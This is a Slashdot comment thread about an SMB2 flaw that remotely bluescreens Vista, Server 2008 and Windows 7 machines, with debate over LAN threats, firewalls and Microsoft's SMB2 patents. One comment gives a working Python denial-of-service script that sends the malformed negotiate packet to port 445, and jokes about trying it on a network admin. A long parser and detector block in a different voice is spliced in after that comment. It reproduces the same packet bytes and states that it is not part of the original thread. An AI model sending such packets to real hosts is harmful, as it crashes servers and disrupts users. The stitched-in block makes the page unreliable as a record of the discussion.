
Windows 7 Reintroduces Remote BSoD (427 comments)

Posted by timothy on Tuesday September 08, @08:59AM
from the no-such-thing-as-perfect-security dept.
Tags: microsoft, security
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy of the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
  • Local? (Score:5, Interesting)

    by MindStalker (22827) <jlarsen AT fsu DOT edu> on Tuesday September 08, @09:02AM (#29350609) Journal

    If it relies on an SMB2 request it is most likely restricted to requests from inside the LAN.
    Either way, still bad.

    • Re:Local? (Score:4, Interesting)

      by fuzzyfuzzyfungus (1223518) on Tuesday September 08, @09:05AM (#29350669) Journal
      Especially unpleasant given that SMB2 is pretty common on important shared resources. Like fileservers.

      Crashing clients is bad, any client on the LAN being able to take down the fileserver is substantially worse.
      • Re:Local? (Score:5, Interesting)

        by afidel (530433) on Tuesday September 08, @09:16AM (#29350801)
        Actually the headline is very misleading and that's bad. This affects SMB2 which is in Vista and Server 2008 as well, that means every Server 2008 system is likely vulnerable to a LAN based DoS attack.
        • "RE"-introducing? (Score:5, Interesting)

          by WED Fan (911325) <`ten.liamhsart' `ta' `egihaka'> on Tuesday September 08, @09:50AM (#29351299) Homepage Journal

          The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.

          Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have to twist and stretch like taffy to make the case"?

          It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.

        • Re:Local? (Score:4, Funny)

          by GameMaster (148118) on Tuesday September 08, @09:50AM (#29351301)

          Of course, the proper remedy for this (given that it is on a LAN) is to get up, walk down the hall, and beat the crap out of the douche-bag who's DoSing you. Really, the only reason DoS attacks work so well on the Internet is that the guys doing it are probably half-way around the world.

          • Re:Local? (Score:5, Informative)

            by afidel (530433) on Tuesday September 08, @10:02AM (#29351463)
            What about the employee who just got fired who sets off an IP walk that crashes every file server? What about the employee that gets the malware of the day and it includes the ability for the 0wner to launch this attack inside your LAN? There's a lot more potential for abuse than just the prankster on the helpdesk deciding he wants to create some havoc.
    • Re: (Score:3, Insightful)

      Agreed -- it IS rather bad, but generally speaking you're not expecting attacks from inside your LAN. As Windows vulnerabilities go, this isn't horrible in a practical sense.
      • Re: (Score:3, Insightful)

        Not expecting such a problem until you go to college; half of the students on my campus don't even have a password put on their computers, making it extremely easy to access them remotely as is. If everyone had Win 7 installed, well...it'd make for some interesting work.
        • Re:Local? (Score:5, Interesting)

          by Sethb (9355) <bokelman@gmail.com> on Tuesday September 08, @09:40AM (#29351121) Homepage
          Uh, by default on modern incarnations of Windows, accounts without passwords are *not* allowed to log in remotely. So, they're extremely difficult to access remotely.
          • Re: (Score:3, Funny)

            by Anonymous Coward

            Digital cameras make for plenty of things worth finding.

      • ...generally speaking you're not expecting attacks from inside your LAN...

        Even if you have total control over all physical access points to your LAN, and total trust in your user base, there is still a chance that internal people can try to do nasty things - and in some ways they may have more motivation to do so.

        I think the concept of "internal/trusted network" is going to shrink - nowadays I tend to think of the "internal network" as ending at the edge of centralised server resources, and clients on what would have been called the "internal LAN" are actually outside of wha

        • Re:Local? (Score:4, Interesting)

          by phoenix321 (734987) * on Tuesday September 08, @11:16AM (#29352639)

          Second that big time.

          The belief that a cloud of several thousand clients can ever be held secure is almost obscene. IT departments that concentrate most heavily on defending the outer border of their network, placing more than only a slight hint of trust in their "owned" client hardware are hopefully becoming rare.

          Several thousand notebooks, travelling along the employees all around the world, through a hundred massive wifi-zones, hotel LANs, airports etc., should not be trusted higher than the machine Joe Random Employee brought from home. The official corporate notebook may have all the branding, settings, applications and whatnot, but that can at best make it a decently hardened PC, not bullet proof.

          Many organisations really concentrate on the border, falling to the illusion of control: "we control the machine, the user / employee has no admin rights, so all machines that go along on a business trip come back in perfect shape and without ever acquiring a drive-by rootkit somewhere"

          In reality, most breaches are done, or facilitated, or unknowingly supported by people inside the organisation. Disgruntled employees are surely the worst enemy - and guaranteed to be numerous in any multinational company under the current economy. But it can also be frequent-fliers, hard-working staff that take their laptops everywhere and try to work all the time, connecting to a hundred different wifi-APs per year. Trusting a machine means physical control over everything. Trusting machines that commute and travel daily along with their employees is batshit crazy - but most IT departments still pretend they don't see that.

          • Re: (Score:3, Interesting)

            Trust in computer disciplines doesn't have anything to do with something being trustworthy. Trust is an expression that you have left yourself vulnerable, and are trusting that you won't be exploited. How you feel about leaving yourself vulnerable is irrelevant. The probability that you will be exploited is also irrelevant.

            That's what Trusted Computing is all about... it's not that your computer is more secure... it's that your computer is less secure, and you are trusting third parties not to screw you

      • Re:Local? (Score:5, Funny)

        by GameMaster (148118) on Tuesday September 08, @09:49AM (#29351271)

        NOBODY EXPECT ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.

      • Re: (Score:3, Interesting)

        generally speaking you're not expecting attacks from inside your LAN. As Windows vulnerabilities go, this isn't horrible in a practical sense.

        Really? That may be true in small(ish) companies, say less than 50 employees. In general, many security experts beg to differ [usfst.com], however.

        Some select quotes:

        "In 92 percent of the incidents [re. inside attacks] investigated, revenge was the primary motivator."

        Common attacks:

        Manipulation of Protocol Design Flaws: Protocol weaknesses in TCP/IP can result in a virtual treasu

        • Re:Local? (Score:4, Insightful)

          by gazbo (517111) on Tuesday September 08, @09:22AM (#29350881)
          Just because IPv6 reduces the need for NAT doesn't mean you shouldn't use a firewall. I assume that's what you were talking about anyway.
    • Re:Local? (Score:5, Funny)

      by poetmatt (793785) on Tuesday September 08, @09:45AM (#29351231)

      well, now I know how to win any lan party contests :)

  • The difference is... (Score:3, Interesting)

    by Xest (935314) on Tuesday September 08, @09:04AM (#29350647)

    ...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.

    Realistically this isn't going to affect many people like the old exploit did.

    Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.

    • by rastilin (752802) on Tuesday September 08, @09:22AM (#29350873)

      Rewritten software is a double-edged sword. On the one hand you are able to finally discard the truly broken sections of your previous implementation; allowing you to make massive leaps forward. On the other you're getting rid of a large list of known bugs and replacing it with an even larger list of unknown ones.

      One of the most useful features of old technology is that it breaks in predictable ways.

      So it's not too surprising that something like this happened. Doesn't worry me either, I have firewalls and a NAT on all my machines, no reason not to. However since it's something that happened before, it's irritating that Microsoft didn't think to check for something like this.

    • by Sfing_ter (99478) <`ten.llun' `ta' `natek'> on Tuesday September 08, @09:24AM (#29350897) Homepage Journal

      really - unless the person sets the "Let Microsoft decide when and where I do updates" most of the updates WILL NOT be done. The average person uses the computer like a tv - turn it on to see the web and turn it off when done. Leave my computer on ALL NIGHT just so i can backup/run antivirus/run defrag/run etc. etc. ???

      Oh yeah these people do exist and they have 'FRIENDS' that 'KNOW' computers and 'HELP' them out by turning off that annoying UAC or giving them a 'FREE' version of office. The looks on their faces when I explain that the software they got off Limewire is infected with virus' - they can't believe microsoft would do that!!! THAT is the mentality, and that is why these attacks have always worked, and will always work.

  • by onion2k (203094) on Tuesday September 08, @09:04AM (#29350653) Homepage

    It's incredibly unlikely to ever affect anyo

  • - Shiny-new interface.
    - No annoying "are you sure" popups every 30 seconds like Vista.
    - Can run on a 1 gigabyte machine without slowing to a crawl.

    It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.

  • Not consistent (Score:5, Interesting)

    by james_a_craig (798098) * <(slashdot) (at) (jamiecraig.com)> on Tuesday September 08, @09:08AM (#29350713)

    Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".

  • Correction! (Score:5, Informative)

    I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

    And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

    • Re:Correction! (Score:4, Informative)

      by Anonymous Coward on Tuesday September 08, @09:17AM (#29350811)
      And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.
  • by UncHellMatt (790153) on Tuesday September 08, @09:10AM (#29350745)
    ...that my fellow Boston Public School graduates are writing for seclists.org.

    Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "

    Yes, because we been done had seen that explot in the pasts.

    Dear $DEITY, are there no proof readers or editors alive on these sites?
  • by jim_v2000 (818799) on Tuesday September 08, @09:21AM (#29350865)
    IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANs. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.
  • by Anonymous Coward on Tuesday September 08, @09:24AM (#29350901)

    Hi. I'm an adult. I work as a software engineer.

    I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

    I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

    If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.

    1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.

    2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.

    3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.

    4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

  • by Seth Kriticos (1227934) on Tuesday September 08, @09:25AM (#29350917)
    Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

    The exploit (which is actually ridiculously simple) goes as follows:

    #!/usr/bin/python
    # When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA
    from socket import socket
    from time import sleep

    host = ("IP_ADDR", 445)
    buff = (
    b"\x00\x00\x00\x90" # NetBIOS session message: 0x90 (144) bytes follow
    b"\xff\x53\x4d\x42" # Server Component: SMB ("\xffSMB" magic)
    b"\x72\x00\x00\x00" # Command 0x72: Negotiate Protocol, then first 3 bytes of NT status
    b"\x00\x18\x53\xc8" # last status byte, Flags 0x18, Flags2 0xc853
    b"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" # Signature (8), Reserved (2), TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" # UID, MID, WordCount 0, ByteCount 0x6d, then the dialect list: "PC NET"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" # "WORK PROGRAM 1"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" # ".0", "LANMAN1.0"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" # "Windows for W"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" # "orkgroups 3.1a"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" # "LM1.2X002", "L"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" # "ANMAN2.1", "NT L"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" # "M 0.12", "SMB 2."
    b"\x30\x30\x32\x00"                                         # "002"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    Current problem solution: disable the SMB protocol on your infrastructure..

    Now please excuse me, I have go and play a bit with our network admin.. /joke
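Added example, not from the parent post or from the seclists advisory it quotes: a parser for the request above, following the standard 32-byte SMB1 header layout, plus a detection check that flags a Negotiate Protocol request whose Process ID High field is nonzero (the field the post identifies as the trigger). The byte literal is constructed from the post's packet; the builder, the field names and the function names are this example's own and are assumptions, not anything from the advisory.

```python
import struct

# Standard SMB1 (CIFS) header, 32 bytes, little-endian:
# magic(4) command(1) status(4) flags(1) flags2(2) pid_high(2)
# signature(8) reserved(2) tid(2) pid(2) uid(2) mid(2)
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

# Dialects offered by the posted request, in order. "SMB 2.002" is what asks an
# SMB2-capable server (Vista/2008/7) to handle the request on its SMB2 side.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
    b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002",
]

# Constructed sample: byte-for-byte the packet the parent post sends.
POSTED_BYTES = (
    b"\x00\x00\x00\x90"                  # NetBIOS session message, 144 bytes follow
    b"\xff\x53\x4d\x42"                  # "\xffSMB"
    b"\x72\x00\x00\x00\x00"              # Negotiate (0x72), NT status 0
    b"\x18\x53\xc8"                      # Flags 0x18, Flags2 0xc853
    b"\x00\x26"                          # PID High: 00 26, the "&" byte
    b"\x00\x00\x00\x00\x00\x00\x00\x00"  # signature
    b"\x00\x00\xff\xff\xff\xfe"          # Reserved, TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00"                  # UID, MID
    b"\x00"                              # WordCount 0
    b"\x6d\x00"                          # ByteCount 109
    b"\x02PC NETWORK PROGRAM 1.0\x00"
    b"\x02LANMAN1.0\x00"
    b"\x02Windows for Workgroups 3.1a\x00"
    b"\x02LM1.2X002\x00"
    b"\x02LANMAN2.1\x00"
    b"\x02NT LM 0.12\x00"
    b"\x02SMB 2.002\x00"
)


def build_negotiate(dialects, pid_high=0):
    """Build a NetBIOS-framed SMB_COM_NEGOTIATE request (this example's own
    reconstruction). pid_high=0 is what a normal client sends."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)  # BufferFormat 0x02 + ASCIIZ
    header = SMB1_HEADER.pack(SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                              pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body  # WordCount, ByteCount, data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb            # NetBIOS session framing


BENIGN = build_negotiate(DIALECTS, pid_high=0)  # same request, PID High zeroed


def parse_netbios_session(data):
    """Strip the 4-byte NetBIOS session header and return the SMB payload."""
    if len(data) < 4 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(data[1:4], "big")
    if len(data) < 4 + length:
        raise ValueError("truncated NetBIOS message")
    return data[4:4 + length]


def parse_smb1_header(smb):
    """Unpack the fixed SMB1 header into a dict keyed by field name."""
    if len(smb) < SMB1_HEADER.size or smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    names = ("magic", "command", "status", "flags", "flags2", "pid_high",
             "signature", "reserved", "tid", "pid", "uid", "mid")
    return dict(zip(names, SMB1_HEADER.unpack_from(smb)))


def parse_negotiate_dialects(smb):
    """Return the dialect strings offered in an SMB_COM_NEGOTIATE request."""
    wct = smb[32]                       # WordCount (parameter words)
    off = 33 + 2 * wct
    bcc = struct.unpack_from("<H", smb, off)[0]
    data = smb[off + 2:off + 2 + bcc]
    if len(data) != bcc:
        raise ValueError("truncated dialect list")
    dialects = []
    while data:
        if data[0] != 0x02 or b"\x00" not in data:
            raise ValueError("malformed dialect entry")
        end = data.index(b"\x00")
        dialects.append(data[1:end])
        data = data[end + 1:]
    return dialects


def flag_pid_high_negotiate(tcp_payload):
    """Detection check: True for an SMB1 Negotiate whose PID High is nonzero,
    False for anything else, including non-SMB or truncated traffic."""
    try:
        hdr = parse_smb1_header(parse_netbios_session(tcp_payload))
    except ValueError:
        return False
    return hdr["command"] == SMB_COM_NEGOTIATE and hdr["pid_high"] != 0


if __name__ == "__main__":
    for name, pkt in (("posted", POSTED_BYTES), ("benign", BENIGN)):
        smb = parse_netbios_session(pkt)
        hdr = parse_smb1_header(smb)
        print(name, "pid_high=0x%04x" % hdr["pid_high"],
              "dialects=%d" % len(parse_negotiate_dialects(smb)),
              "flagged=%s" % flag_pid_high_negotiate(pkt))
```

Running it prints the parsed fields for the posted packet and for the same request with PID High zeroed; only the first is flagged. The check is a signature for this one malformation on port 445, not a test of whether a host is vulnerable: as james_a_craig notes above, not every Windows 7 machine crashed on it, so a host surviving the packet says nothing about its patch state.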
    • IP Reasons for SMB2 (Score:5, Interesting)

      by eldavojohn (898314) * <my/.username@@@gmail.com> on Tuesday September 08, @09:11AM (#29350755) Homepage Journal

      they don't like introducing "new" things

      A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia [wikipedia.org]:

      SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html [ubiqx.org] for historical detail).

      The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).

      So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.

      While SAMBA 4.0 has experimental support for SMB2 interfacing [samba.org], I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.

      • Re: (Score:3, Informative)

        No, it won't. The specs are right here [microsoft.com].

        • Re: (Score:3, Informative)

          Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promise nor the Community Promise (both linked) cover SMB2.

        • by eldavojohn (898314) * <my/.username@@@gmail.com> on Tuesday September 08, @09:38AM (#29351097) Homepage Journal

          No, it won't. The specs are right here [microsoft.com].

          "No, it won't" what? Possibly spell problems for the Samba team? From your link:

          Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

          Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

          Why do they use the ambiguous language quoted above if this is an open technology I'm not supposed to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.

    • Re: (Score:3, Informative)

      I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
      • by Rik Sweeney (471717) on Tuesday September 08, @09:14AM (#29350783) Homepage

        Let me Loony Tunes that up for you:

        Wabbit Season!
        Duck Season!

        Wabbit Season!
        Duck Season!

        • Re: (Score:3, Funny)

          by Anonymous Coward

          Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.

          When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.
